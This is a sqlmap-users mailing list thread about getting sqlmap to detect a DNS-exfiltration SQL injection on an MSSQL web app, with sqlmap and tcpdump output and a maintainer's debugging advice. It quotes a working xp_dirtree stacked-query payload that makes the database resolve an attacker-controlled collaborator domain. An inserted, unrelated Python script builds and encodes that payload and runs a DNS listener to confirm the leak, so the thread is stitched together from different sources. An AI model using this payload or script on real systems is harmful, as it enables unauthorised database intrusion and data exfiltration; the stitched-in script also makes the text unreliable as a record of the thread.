Thanks, that's good advice.  And I probably should post a little more detail on 
what I'm running here so others can see it as well.


Here's the command executing:


root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory 
--force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com 
--force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.0.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior 
mutual consent is illegal. It is the end user's responsibility to obey all 
applicable local, state and federal laws. Developers assume no liability and 
are not responsible for any misuse or damage caused by this program

[*] starting at 16:56:14

[16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
[16:56:14] [INFO] setting up DNS server instance
custom injection marking character ('*') found in option 
'--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] 
n
[16:56:16] [INFO] testing connection to the target URL
[16:56:18] [INFO] testing if the target URL is stable
[16:56:19] [WARNING] target URL is not stable. sqlmap will base the page 
comparison on a sequence matcher. If no dynamic nor injectable parameters are 
detected, or in case of junk results, refer to user's manual paragraph 'Page 
comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 
'ProductCategory' might not be injectable
[16:56:23] [INFO] testing for SQL injection on GET parameter 'ProductCategory'
[16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE 
or HAVING clause (IN)'
[16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries 
(comment)'
[16:56:39] [WARNING] time-based comparison requires larger statistical model, 
please wait......... (done)
[16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be 
injectable
[16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try to 
increase '--level'/'--risk' values to perform more tests. Also, you can try to 
rerun by providing either a valid value for option '--string' (or '--regexp'). 
If you suspect that there is some kind of protection mechanism involved (e.g. 
WAF) maybe you could retry with an option '--tamper' (e.g. 
'--tamper=space2comment')
[16:58:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 98 times

[*] shutting down at 16:58:03



And then, my capture results for DNS traffic:


root@bass:~# tcpdump -n -i eth0 udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. 
(30)
16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? 
www.testsite.org. (30)
16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 
173.213.231.200 (46)
16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org. 
(30)
16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? 
www.testsite.org. (30)
16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 
173.213.231.200 (46)
16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org. 
(30)
16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? 
www.testsite.org. (30)
16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 
173.213.231.200 (46)
16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org. 
(30)
16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? 
www.testsite.org. (30)
16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200 
(46)
16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org. 
(30)
16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? 
www.testsite.org. (30)
16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 
173.213.231.200 (46)
16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)


It doesn't seem like an injection pattern is being tried that is getting the 
DNS exfiltration to occur... or else I'm doing something else wrong.


Thanks,

V
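As an added example, not code from this thread, from sqlmap or from Burp: the Python script below builds the same kind of xp_dirtree stacked-query payload that the original question quotes further down, and on the receiving side parses raw UDP/53 packets (the traffic the tcpdump filter above captures) to pick out a query that carries the token under the collector domain, ignoring unrelated lookups such as the scanner's own resolution of the target host. The collector domain dns.example.com, the base parameter value 45 and the sample packet produced by build_dns_query are assumptions made for this example; on a real run the NS record for the collector domain must delegate to the listening host and nothing else may be bound to UDP/53.

```python
"""Added example (not code from the thread): build the xp_dirtree DNS-exfil
payload quoted in the original question and verify the hit on the receiver.
Hypothetical: the collector domain dns.example.com and the sample packet."""
import secrets
import socket
import struct
import time
import urllib.parse

DNS_DOMAIN = "dns.example.com"   # assumed; the thread uses its own --dns-domain


def build_xp_dirtree_payload(token: str, dns_domain: str, max_len: int = 99) -> str:
    """Stacked query that makes SQL Server resolve <token>.<dns_domain> while
    xp_dirtree tries to open the UNC path. As in the thread's payload the host
    is split over two literals joined with '+'. The UNC path must fit the
    declared varchar(N) or it is silently truncated and the token is lost."""
    unc = f"\\\\{token}.{dns_domain}\\rtf"
    if len(unc) > max_len:
        raise ValueError(f"UNC path is {len(unc)} chars, over varchar({max_len})")
    head, tail = dns_domain[: len(dns_domain) // 2], dns_domain[len(dns_domain) // 2:]
    return (f"';declare @q varchar({max_len});"
            f"set @q='\\\\{token}.{head}'+'{tail}\\rtf';"
            " exec master.dbo.xp_dirtree @q;--")


def inject_into_query(base_value: str, payload: str) -> str:
    """Encode the parameter value as it would travel in the GET query string."""
    return urllib.parse.quote(base_value + payload, safe="'()@\\")


def build_dns_query(qname: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """Constructed sample: a minimal RFC 1035 query (what 'udp port 53' captures)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = b"".join(bytes([len(l)]) + l.encode("ascii")
                      for l in qname.rstrip(".").split("."))
    return header + labels + b"\x00" + struct.pack("!HH", qtype, 1)


def parse_dns_query(packet: bytes):
    """Return (txid, qname, qtype) of a DNS query; ValueError on anything else."""
    if len(packet) < 12:
        raise ValueError("short packet")
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if flags & 0x8000 or qdcount < 1:
        raise ValueError("not a query")
    pos, labels = 12, []
    while True:
        if pos >= len(packet):
            raise ValueError("truncated name")
        n, pos = packet[pos], pos + 1
        if n == 0:
            break
        if n & 0xC0:          # compression pointers are not expected in a QNAME
            raise ValueError("unexpected label type")
        labels.append(packet[pos:pos + n].decode("ascii", "replace"))
        pos += n
    if pos + 4 > len(packet):
        raise ValueError("truncated question")
    qtype = struct.unpack("!H", packet[pos:pos + 2])[0]
    return txid, ".".join(labels), qtype


def extract_token(qname: str, dns_domain: str):
    """Label(s) under dns_domain, lower-cased, or None for unrelated names
    such as the scanner's own lookups of the target host."""
    suffix, q = "." + dns_domain.lower(), qname.lower().rstrip(".")
    return q[: -len(suffix)] if q.endswith(suffix) and len(q) > len(suffix) else None


def confirm_exfil(packet: bytes, token: str, dns_domain: str) -> bool:
    """True only if this packet is an A/AAAA query for <token>.<dns_domain>."""
    try:
        _txid, qname, qtype = parse_dns_query(packet)
    except ValueError:
        return False
    return qtype in (1, 28) and extract_token(qname, dns_domain) == token.lower()


def wait_for_token(token: str, dns_domain: str, bind=("0.0.0.0", 53), timeout=60.0) -> bool:
    """Bind UDP/53 (root, and nothing else on :53) and wait for the token.
    The NS record for dns_domain must delegate to this host or nothing arrives."""
    deadline = time.monotonic() + timeout
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.bind(bind)
        while time.monotonic() < deadline:
            s.settimeout(max(0.1, deadline - time.monotonic()))
            try:
                data, _peer = s.recvfrom(512)
            except socket.timeout:
                break
            if confirm_exfil(data, token, dns_domain):
                return True
    return False


if __name__ == "__main__":
    token = secrets.token_hex(16)
    payload = build_xp_dirtree_payload(token, DNS_DOMAIN)
    print("ProductCategory=" + inject_into_query("45", payload))
    # Offline check with a constructed packet; on a real run call wait_for_token().
    print(confirm_exfil(build_dns_query(f"{token}.{DNS_DOMAIN}"), token, DNS_DOMAIN))
```

The length check is there because the quoted payload declares varchar(99): a collector domain plus a long token that pushes the UNC path past that limit gets truncated by SQL Server before xp_dirtree ever runs, and the resulting lookup (if any) no longer carries the token. Applying confirm_exfil to what arrives on :53 also separates a genuine hit from the resolver chatter in a capture like the one above, where every query is the scanning host looking up the target name itself.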

________________________________
From: Miroslav Stampar <miroslav.stam...@gmail.com>
Sent: Monday, December 19, 2016 4:10 PM
To: Mark M.
Cc: sqlmap-users@lists.sourceforge.net
Subject: Re: [sqlmap-users] Sqlmap/DNS exfil

I would suggest you run Wireshark or similar when running with --dns-domain to 
properly debug what is going on. There could be a lot of problems before you 
fine-tune it (e.g. another service running on :53).

About "forcing" sqlmap to use dns-exfil: it will always at least try to test it 
at the start of a run (if another injection technique is available). Also, it 
will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, 
there is a hidden switch "--force-dns" which will force the usage of dns-exfil 
even if ERROR/UNION are available.

As said, the best advice I can give you is to run Wireshark during the run and 
really see what is going on.

Bye

On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@hotmail.com> wrote:

I have a situation where Burp has detected the following DNS exfiltration 
injection for a query parameter in a web app:


GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1


To make that a little easier to read, the injected value is:


';declare @q varchar(99);set 
@q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; 
exec master.dbo.xp_dirtree @q;--


I've modified the domain and verified that I receive the DNS requests on my 
local DNS server (the domain which I provide to sqlmap using the 
--dns-domain=xxx option) when the injection is manually sent to the page.  The 
problem is, when I pass the request to sqlmap it's not detecting that there's 
an injection at all.  I've provided the OS/DBMS and --level 5, but still no 
dice.  I'm using sqlmap v1.0.12#stable.


Since I've gotten many other injections to work in the past, I believe that I'm 
using sqlmap properly (formatting my request in a file appropriately, 
specifying the correct parameter to test, etc.) However, it surprised me that 
what appeared to be a fairly straightforward stacked SQL injection would slip 
by all of sqlmap's tests. Is there a way to force sqlmap to try DNS 
exfiltration injections despite no other injection technique succeeding?


Thanks

V



_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users




--
Miroslav Stampar
http://about.me/stamparm